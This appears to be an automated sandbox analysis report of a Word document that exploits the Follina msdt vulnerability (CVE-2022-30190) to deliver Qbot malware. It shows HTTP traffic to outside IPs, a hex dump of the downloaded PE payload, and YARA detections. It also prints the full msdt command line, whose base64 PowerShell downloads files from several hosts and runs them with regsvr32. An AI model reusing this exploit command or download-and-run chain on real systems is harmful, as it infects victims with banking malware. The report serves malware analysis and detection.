                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.383161068 CEST945INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:15.592542887 CEST1193OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.620670080 CEST1301INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:15.807533026 CEST1303OUTGET /123.RES HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            If-None-Match: "6299dd5d-1861"
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.836622953 CEST1303INHTTP/1.1 304 Not Modified
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Jun 7, 2022 19:50:15.843090057 CEST1303OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.871623039 CEST1304INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:16.061703920 CEST1304OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:16.090388060 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:16 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:18.555954933 CEST1305OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:18.584733009 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:18 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            2192.168.2.549865185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Jun 7, 2022 19:51:26.283952951 CEST12199OUTGET /972639944.dat HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452574015 CEST12201INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:51:26 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 1437696
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Expires: 0
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Disposition: attachment;
                                                                                                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54
                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B* @Pp%HlSCODE `DATA' (@BSSqP..idata%p&.@.reloclSTT@P.rsrcHH@PP@P@Boolean@FalseT
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452677011 CEST12202INData Raw: 72 75 65 8d 40 00 2c 10 40 00 09 08 57 69 64 65 43 68 61 72 03 00 00 00 00 ff ff 00 00 90 44 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 58 10 40 00 01 08 53 68 6f 72 74 69 6e 74 00 80 ff ff ff 7f 00 00 00 90 70 10 40 00 01 08 53 6d
                                                                                                                                                                                            Data Ascii: rue@,@WideCharD@CharX@Shortintp@Smallint@Integer@Byte@Word@Extended@Cardinal@Int64@Single
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452698946 CEST12203INData Raw: ff 25 e0 71 51 00 8b c0 ff 25 dc 71 51 00 8b c0 ff 25 00 72 51 00 8b c0 ff 25 d8 71 51 00 8b c0 ff 25 fc 71 51 00 8b c0 ff 25 d4 71 51 00 8b c0 ff 25 d0 71 51 00 8b c0 ff 25 cc 71 51 00 8b c0 ff 25 c8 71 51 00 8b c0 ff 25 c4 71 51 00 8b c0 ff 25
                                                                                                                                                                                            Data Ascii: %qQ%qQ%rQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%rQ%rQ%rQ%qQ%qQ% rQ%rQ%rQ%qQ%qQ%
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452717066 CEST12205INData Raw: c6 ff 0f 00 00 81 e6 00 f0 ff ff 89 34 24 8b eb 03 ea 81 e5 00 f0 ff ff 8b 04 24 89 01 8b c5 2b 04 24 89 41 04 8b 35 ec 55 51 00 eb 38 8b 5e 08 8b 7e 0c 03 fb 3b 1c 24 73 03 8b 1c 24 3b ef 73 02 8b fd 3b fb 76 1c 68 00 40 00 00 2b fb 57 53 e8 ad
                                                                                                                                                                                            Data Ascii: 4$$+$A5UQ8^~;$s$;s;vh@+WSuUQ6UQuZ]_^[@SVWUUQ?]3;{,C>tPFCF)C{u>5;u>t!<$uV
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452734947 CEST12206INData Raw: e8 f3 05 00 00 c3 8b c0 83 fa 0c 7c 0e 83 ca 02 89 10 83 c0 04 e8 ca ff ff ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 c8 55 51 00 04 00 00
                                                                                                                                                                                            Data Ascii: || SVtUQ+3tUQt r+;ptUQ^[@SVW3t%uXF#_^[SVWU$
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452752113 CEST12207INData Raw: 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 55 51 00 83 eb 04 01 1d b8 55 51 00 e8 92 18 00 00 e9 84 00 00 00 3b 1d 1c 56 51 00 7f 4a 29 1d 1c 56 51 00 83 3d 1c 56 51 00 0c 7d 0d 03 1d 1c 56 51 00 33 c0 a3 1c 56 51 00 a1
                                                                                                                                                                                            Data Ascii: MREUQUQ;VQJ)VQ=VQ}VQ3VQ VQ VQEUQUQ=2E3ZYYdh%@=MPQthUQcE_^[YY]@UQSVW3UQ=UQufuUQEa
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452764988 CEST12208INData Raw: eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 44 20 51 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 20 51 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 20 51 00 59 09 c0 74 e7
                                                                                                                                                                                            Data Ascii: 3[t2tPD QYt@ QutP< QYt@@tq@@3_@tQ@@3SV=@t
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452784061 CEST12209INData Raw: 2f 40 00 00 8b b0 00 00 00 00 8b 5e 08 e8 21 40 00 00 33 c0 89 46 08 eb 02 33 db 8b c3 5e 5b c3 8d 40 00 89 15 04 20 51 00 e8 4d 18 00 00 c3 53 56 8b f2 8b d8 80 e3 7f 83 3d 08 50 51 00 00 74 0a 8b d6 8b c3 ff 15 08 50 51 00 84 db 75 0d e8 df 3f
                                                                                                                                                                                            Data Ascii: /@^!@3F3^[@ QMSV=PQtPQu?w3H Q3^[$PRQ?YZXu1@S?[VW|$1t+~9)@|9G1_
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452800035 CEST12210INData Raw: 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 c7 30 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 fd 31 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 93 32 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92
                                                                                                                                                                                            Data Ascii: S0@tytS1@taC2@S=}FS0@t4tS1@tC2@0@[?@@@@@P@$@@
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480300903 CEST12212INData Raw: ff ff ff 00 01 c1 89 d0 8b 11 e9 80 2d 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 f8 35 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03
                                                                                                                                                                                            Data Ascii: -@USVW3]U3Uh5@d0d 3Uct1Ct>>t!PPMSrU->3ZYYdh5@E,_^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480334044 CEST12213INData Raw: 06 00 00 00 0f 85 6f 01 00 00 81 38 de fa ed 0e 74 1f fc e8 41 f9 ff ff 8b 15 0c 50 51 00 85 d2 0f 84 53 01 00 00 ff d2 85 c0 75 0a e9 48 01 00 00 8b 40 18 8b 00 8b 54 24 08 53 56 57 55 8b 4a 04 8b 59 05 8d 71 09 89 c5 8b 06 85 c0 74 43 89 ef eb
                                                                                                                                                                                            Data Ascii: o8tAPQSuH@T$SVWUJYqtC?9t7H;Ou@W1:u@B-tuKu]_^[D$8PHtAPQT$2=, Qv=( QwL$PQXD$H'=, Qv=( Q


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:19:50:04
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                            Imagebase:0x10a0000
                                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:19:50:11
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:19:50:11
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:19:50:17
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                                            Imagebase:0x870000
                                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:19:50:52
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:19:50:54
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:19:51:00
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:19:51:02
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:19:51:27
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:19:51:28
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
